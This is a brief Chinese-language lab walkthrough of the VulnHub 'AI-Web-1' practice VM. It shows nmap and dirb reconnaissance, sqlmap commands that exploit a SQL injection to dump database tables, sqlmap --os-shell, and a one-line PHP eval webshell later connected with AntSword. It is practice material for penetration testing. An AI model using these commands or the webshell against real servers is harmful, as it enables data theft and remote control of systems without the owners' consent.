靶机地址:
https://www.vulnhub.com/entry/ai-web-1,353/攻击机:kali
首先虚拟机建一个A1web 1.0靶机 切换nat模式 然后kali扫描
nmap -sV ip段 0/24 扫描出ip进行访问
访问没有什么信息
使用dirb 对网页进一步扫描
扫描出来地址进行访问
尝试发现robots.txt中有内容
访问发现/m3diNf0/不能正常访问
发现/se3reTdir777/uploads/也不能访问页面
使用dirb 对/m3diNf0和/se3reTdir777扫描
发现一个网址访问发现是phpinfo页面
继续扫/se3reTdir777
访问index.php
发现是查询页面 考虑sql注入 输入’报错发现sql注入漏洞
通过抓包得到注入点uid=1&Operation=Submit
使用sqlmap注入页面为http://192.168.77.134/se3reTdir777/index.php
注入点为uid=1&Operation=Submit--dbs 列出数据库
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs
得到了aiweb1 information_schema 两个数据库 -D 指定数据库 aiweb1 --tables 列出表名
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables
得到 user systemUser 两个表名 再通过-T 指定表名user --columns 列出字段
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns
得到 firstName id lastName 3个字段 再-C 指定字段 id --dump 获取字段中的数据
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump
获取shell:
sqlmap -u "http://192.168.77.134/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell
选2自定义路径 连接成功
上传一句话木马
<?php @eval($_POST['cmd'])?>
上传成功
访问使用蚁剑连接
连接成功并添加得到信息